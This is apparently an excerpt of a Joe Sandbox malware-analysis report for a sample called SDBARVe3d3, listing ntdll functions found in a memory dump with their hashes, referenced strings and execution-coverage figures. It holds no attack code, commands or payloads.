                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cb79a41b8be069327481432c14c6ad5ac656fc5412ca9b3557ce7611ae72ab9d
                                                                                                                                    • Instruction ID: 2780cf273c5fc94c4fe614b103c12c95c624f9d3e9eabe41bc76b0d4db20d2a0
                                                                                                                                    • Opcode Fuzzy Hash: cb79a41b8be069327481432c14c6ad5ac656fc5412ca9b3557ce7611ae72ab9d
                                                                                                                                    • Instruction Fuzzy Hash: 66900221215D0042D70075688C18B07400597D0303F56C135A0154564CC9158A615622
                                                                                                                                    Function 01762FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: fe96358129029a32457201c11f509d61e30f30cfc08423a446c9abb56d6cf7ee
                                                                                                                                    • Instruction ID: b3f1194d3bf4a1e2d2d04ebc4ca49bb1f1975e576d4decc26ca21a78ca90354e
                                                                                                                                    • Opcode Fuzzy Hash: fe96358129029a32457201c11f509d61e30f30cfc08423a446c9abb56d6cf7ee
                                                                                                                                    • Instruction Fuzzy Hash: 949002216055004246407168C8489068005BBE1211B56C131A0998560DC5598A655766
                                                                                                                                    Function 01762FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 49fda1b7858ce07dd1fbb255b9020c4775feedd59c29656db7909a9ae9e9a312
                                                                                                                                    • Instruction ID: ff4b3cca795d54c19a22a690eee36f76a5c662edfb669b98fc8b8a2b911d6e87
                                                                                                                                    • Opcode Fuzzy Hash: 49fda1b7858ce07dd1fbb255b9020c4775feedd59c29656db7909a9ae9e9a312
                                                                                                                                    • Instruction Fuzzy Hash: C590023120590402D6007158880C747400597D0302F56C031A5164565EC665CA916632
                                                                                                                                    Function 01762F90 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6204da92fa82b0035802633367e8b46a14f48500a1f50bf981dbcf7a093ec256
                                                                                                                                    • Instruction ID: ab7329b6292be6b87681da3e7e720df5087802b5c3885cf251b62602723777ae
                                                                                                                                    • Opcode Fuzzy Hash: 6204da92fa82b0035802633367e8b46a14f48500a1f50bf981dbcf7a093ec256
                                                                                                                                    • Instruction Fuzzy Hash: E190023120590402D6007158881870B400597D0302F56C031A1164565DC6258A516672
                                                                                                                                    Function 01762E30 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3d15182fe1a3845ca610bf64d393bf6b558e3a83c63c3914921992c72eead119
                                                                                                                                    • Instruction ID: d353c2043eebf6997b8417e0390370371823f9ad361d6e811f05e4b82a04cdb3
                                                                                                                                    • Opcode Fuzzy Hash: 3d15182fe1a3845ca610bf64d393bf6b558e3a83c63c3914921992c72eead119
                                                                                                                                    • Instruction Fuzzy Hash: 5790022130550402D602715884186064009D7D1345F96C032E1424565DC6258B53A233
                                                                                                                                    Function 01762EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a93ab62af8e505f0104c5fb6a777dff61a822335fe0ea26b82b19fcc857590d7
                                                                                                                                    • Instruction ID: 82bd6962fb32a8bd1692ac26adcd46e509f36fbdec0e8e87e570926f84119f01
                                                                                                                                    • Opcode Fuzzy Hash: a93ab62af8e505f0104c5fb6a777dff61a822335fe0ea26b82b19fcc857590d7
                                                                                                                                    • Instruction Fuzzy Hash: FC90026120590403D64075588808607400597D0302F56C031A2064565ECA298E516236
                                                                                                                                    Function 01762EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1b7fcd046201922cf43e1b08bb6b76ab1ff58a24c1ac305742eadc8775b803f7
                                                                                                                                    • Instruction ID: 4f6c544e1c9f4bc262954f19114bef7eff21486d5d7452fdcdf01c255ff79276
                                                                                                                                    • Opcode Fuzzy Hash: 1b7fcd046201922cf43e1b08bb6b76ab1ff58a24c1ac305742eadc8775b803f7
                                                                                                                                    • Instruction Fuzzy Hash: FC90027120550402D64071588408746400597D0301F56C031A5064564EC6598FD56766
                                                                                                                                    Function 01762E80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f327775d835165a68c501467aafc09c4bff2b985fec5efcd8f83c71dc7a4038b
                                                                                                                                    • Instruction ID: 5cec2eb2de273af7ef5c1b27adcc5ecc8f5f9795cd3ef70429dc22916a63c392
                                                                                                                                    • Opcode Fuzzy Hash: f327775d835165a68c501467aafc09c4bff2b985fec5efcd8f83c71dc7a4038b
                                                                                                                                    • Instruction Fuzzy Hash: 3690022160550502D60171588408616400A97D0241F96C032A1024565ECA258B92A232
                                                                                                                                    Function 01763010 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 79c39eabc1282b725051ecd08b42df842b669d685c6d6b3e190f033157dbedfb
                                                                                                                                    • Instruction ID: a2341868aa12a411e605991a7913e10ae2fdffaa38001835c632a06c617d53aa
                                                                                                                                    • Opcode Fuzzy Hash: 79c39eabc1282b725051ecd08b42df842b669d685c6d6b3e190f033157dbedfb
                                                                                                                                    • Instruction Fuzzy Hash: 3890022120594442D64072588808B0F810597E1202F96C039A4156564CC9158A555722
                                                                                                                                    Function 01763090 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9b3c102faf5e2b01819c93eabb7c94a518f708ddb4a01bdfd94ff61da44c7f88
                                                                                                                                    • Instruction ID: e96d7e270f179ab55a5510a91dfb645ae5ba3811d41f26684d2cda3b24fa81e0
                                                                                                                                    • Opcode Fuzzy Hash: 9b3c102faf5e2b01819c93eabb7c94a518f708ddb4a01bdfd94ff61da44c7f88
                                                                                                                                    • Instruction Fuzzy Hash: F890022124550802D6407158C4187074006D7D0601F56C031A0024564DC6168B6567B2
                                                                                                                                    Function 017639B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1e5e8a6ffb5beccaf085e08fb4e9b2ec0f53e57d027d087d40fb9b1813f21c2b
                                                                                                                                    • Instruction ID: ea9e702fbc1a256cb2d72fdf1556f28a4baa4ea54ee583244b53cd6d087a9242
                                                                                                                                    • Opcode Fuzzy Hash: 1e5e8a6ffb5beccaf085e08fb4e9b2ec0f53e57d027d087d40fb9b1813f21c2b
                                                                                                                                    • Instruction Fuzzy Hash: 1F90022124955102D650715C84086168005B7E0201F56C031A08145A4DC5558A556322
                                                                                                                                    Function 01763D70 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7df000a425f2a28584baa55b74dc7d4b7966c2629c521f3ed0b4ff16bdd25dad
                                                                                                                                    • Instruction ID: dd89340cb0f5596f32c6f382878338044ba0ede3612c73785ff05b0b4c4ac8d3
                                                                                                                                    • Opcode Fuzzy Hash: 7df000a425f2a28584baa55b74dc7d4b7966c2629c521f3ed0b4ff16bdd25dad
                                                                                                                                    • Instruction Fuzzy Hash: 8390023520550402DA1071589808646404697D0301F56D431A0424568DC6548AA1A222
                                                                                                                                    Function 01763D10 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1a85e760d6c95d100b533167cfe17dcceef86e3e0146bc41c67937e0d497a8af
                                                                                                                                    • Instruction ID: 1359757081b8d6f89ee8978b24859fff7a0f614623e52348569b2cc399182689
                                                                                                                                    • Opcode Fuzzy Hash: 1a85e760d6c95d100b533167cfe17dcceef86e3e0146bc41c67937e0d497a8af
                                                                                                                                    • Instruction Fuzzy Hash: 51900231206501429A4072589808A4E810597E1302F96D435A0015564CC9148A615322
                                                                                                                                    Function 01762C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                    • Instruction ID: a6829e4c67f372c4345bb54c3a2bcf42fca153cb3710fa567e667a5536103ef7
                                                                                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                    Function 01762890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                                    • Opcode ID: 0254376a9836a6fc6d798ddbb9bfe2ce9649f23f404270ac800f6820e902fb0c
                                                                                                                                    • Instruction ID: b1c81f082015e3e1ff10aa9068d89fecfdd11b82b8a53be36107d0e4522771e2
                                                                                                                                    • Opcode Fuzzy Hash: 0254376a9836a6fc6d798ddbb9bfe2ce9649f23f404270ac800f6820e902fb0c
                                                                                                                                    • Instruction Fuzzy Hash: 7F51D5B1B00216AFDF51DB9C8C9097EFBBCBB48240B14C169E965D7646D734DE04CBA0
                                                                                                                                    Function 017D2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                                    • Opcode ID: e434be150d1d5034ae9b426946a4487198b04ac5848658ae6d8fc0e594c479c2
                                                                                                                                    • Instruction ID: 2484f09295321102679f4ece7783770374025f08f51f0e7e7bec6b488a5b1c37
                                                                                                                                    • Opcode Fuzzy Hash: e434be150d1d5034ae9b426946a4487198b04ac5848658ae6d8fc0e594c479c2
                                                                                                                                    • Instruction Fuzzy Hash: D451F6B1A0064AAECB31DF5CC99097FFBF8EB44200B648899E997D7646E674DE018760
                                                                                                                                    Function 01757630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017946FC
                                                                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01794742
                                                                                                                                    • Execute=1, xrefs: 01794713
                                                                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01794655
                                                                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 01794787
                                                                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01794725
                                                                                                                                    • ExecuteOptions, xrefs: 017946A0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                    • API String ID: 0-484625025
                                                                                                                                    • Opcode ID: 1da4f8b72122beb2543e649d482df790e5d0dc61435ea2332d9126a198b55d87
                                                                                                                                    • Instruction ID: c36553e278c428ac8b2bdb3c7bf9d8ce048224f4f87d58cf864866e6b4ab8ef9
                                                                                                                                    • Opcode Fuzzy Hash: 1da4f8b72122beb2543e649d482df790e5d0dc61435ea2332d9126a198b55d87
                                                                                                                                    • Instruction Fuzzy Hash: 75511B71600219AAEF15AAA8EC99FADF7ACEF14304F8400D9EA05A71C1D7B0DA45CF61
                                                                                                                                    Function 0176B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __aulldvrm
                                                                                                                                    • String ID: +$-$0$0
                                                                                                                                    • API String ID: 1302938615-699404926
                                                                                                                                    • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                    • Instruction ID: fc667bba44a4044465d3398c88dc1083ffdf979374424fc90857a48f389340eb
                                                                                                                                    • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                    • Instruction Fuzzy Hash: CC81A070F4524A9EEF258E6CC8917FEFBB9AF46320F18415ADD51E7291C73898408B91
                                                                                                                                    Function 017D20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                    • String ID: %%%u$[$]:%u
                                                                                                                                    • API String ID: 48624451-2819853543
                                                                                                                                    • Opcode ID: 6c1e76bfc361b309b35f0d55fab752050962925252ed9f410fa94e8612ae5d7d
                                                                                                                                    • Instruction ID: 8c6c7795221a3f309ec49c41f5346410c9e0435daa3245c2ea01b1541b0e0358
                                                                                                                                    • Opcode Fuzzy Hash: 6c1e76bfc361b309b35f0d55fab752050962925252ed9f410fa94e8612ae5d7d
                                                                                                                                    • Instruction Fuzzy Hash: D921817AA0021DABDB11DE79CC44AAEFBF9AF54650F044116E915E3205E7319A028BA1
                                                                                                                                    Function 0174F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017902BD
                                                                                                                                    • RTL: Re-Waiting, xrefs: 0179031E
                                                                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017902E7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                    • API String ID: 0-2474120054
                                                                                                                                    • Opcode ID: 184d412b8d9b2b05e641a933c2db52f6428320f2cace16b946ddacaf1f66c80a
                                                                                                                                    • Instruction ID: 0398d7809a5c936a496418bf9516e0741106963cf7f255da7569b1e117a08df3
                                                                                                                                    • Opcode Fuzzy Hash: 184d412b8d9b2b05e641a933c2db52f6428320f2cace16b946ddacaf1f66c80a
                                                                                                                                    • Instruction Fuzzy Hash: E6E1AB716187419FEB25CF2CD884B2AFBE4AB84314F140A5DF5A5CB2E1D774D948CB42
                                                                                                                                    Function 0175BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • RTL: Resource at %p, xrefs: 01797B8E
                                                                                                                                    • RTL: Re-Waiting, xrefs: 01797BAC
                                                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01797B7F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                    • API String ID: 0-871070163
                                                                                                                                    • Opcode ID: b73db9e5875d0b868c59304b6010cef621bc701908d510ac43eea9d62b78625d
                                                                                                                                    • Instruction ID: 34376e181398082789d36b94b43678a357319e66b62b4c97609888c26fe7c05d
                                                                                                                                    • Opcode Fuzzy Hash: b73db9e5875d0b868c59304b6010cef621bc701908d510ac43eea9d62b78625d
                                                                                                                                    • Instruction Fuzzy Hash: 9B41D2317047029FDB25DE29D840B6AF7E6EF98710F100A1DFE5ADB680DBB1E9058B91
                                                                                                                                    Function 0175B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0179728C
                                                                                                                                    Strings
                                                                                                                                    • RTL: Resource at %p, xrefs: 017972A3
                                                                                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01797294
                                                                                                                                    • RTL: Re-Waiting, xrefs: 017972C1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                    • API String ID: 885266447-605551621
                                                                                                                                    • Opcode ID: a0d34dd55dd3381ed20da8ad2ce97379d104de1433a61869d6e378bc15f0d536
                                                                                                                                    • Instruction ID: 41ccccec3631e508df0e5faae036b85c319b02d4541762d24077b5be8a1f0050
                                                                                                                                    • Opcode Fuzzy Hash: a0d34dd55dd3381ed20da8ad2ce97379d104de1433a61869d6e378bc15f0d536
                                                                                                                                    • Instruction Fuzzy Hash: 25411031614202ABCB25CE29DC81B6AFBA6FF94710F100658FD55AB280DB70E8068BD1
                                                                                                                                    Function 017D2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                    • String ID: %%%u$]:%u
                                                                                                                                    • API String ID: 48624451-3050659472
                                                                                                                                    • Opcode ID: 4b018c4e89ad893542348c7db9d3f304cbc189f5f7fb58baa2c8437803148803
                                                                                                                                    • Instruction ID: 1239a3370454f295d773961046354361464e60780b7f443ad738a404e22f19d9
                                                                                                                                    • Opcode Fuzzy Hash: 4b018c4e89ad893542348c7db9d3f304cbc189f5f7fb58baa2c8437803148803
                                                                                                                                    • Instruction Fuzzy Hash: F0314172A00219AFDB20DF2DCC44BAEF7B8AB54610F54455AED49E3245EF30AA458BA0
                                                                                                                                    Function 01767D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __aulldvrm
                                                                                                                                    • String ID: +$-
                                                                                                                                    • API String ID: 1302938615-2137968064
                                                                                                                                    • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                    • Instruction ID: 42db155ea4b44b7f28b8b00fa33eb8e18384742468fcba5fd978021afddd3ca8
                                                                                                                                    • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                    • Instruction Fuzzy Hash: B491D671E002069BEF28CF6DC881AFEFBA9EF447A8F54451AED55E72C4D73489818B11
                                                                                                                                    Function 01729126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $$@
                                                                                                                                    • API String ID: 0-1194432280
                                                                                                                                    • Opcode ID: 6e7c940d83f2fccf37da5863615b81d3e7fbc7cab1c585d867ee54c6da86aba5
                                                                                                                                    • Instruction ID: b9d07e1727f254928b0668f64349f3f947d95071648d9182a0a8e9088cb2ec01
                                                                                                                                    • Opcode Fuzzy Hash: 6e7c940d83f2fccf37da5863615b81d3e7fbc7cab1c585d867ee54c6da86aba5
                                                                                                                                    • Instruction Fuzzy Hash: CD812A71D402799BDB319B54CC44BEAF7B8AF48714F1441EAEA09B7241E7709E85CFA0

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:3.2%
                                                                                                                                    Dynamic/Decrypted Code Coverage:4%
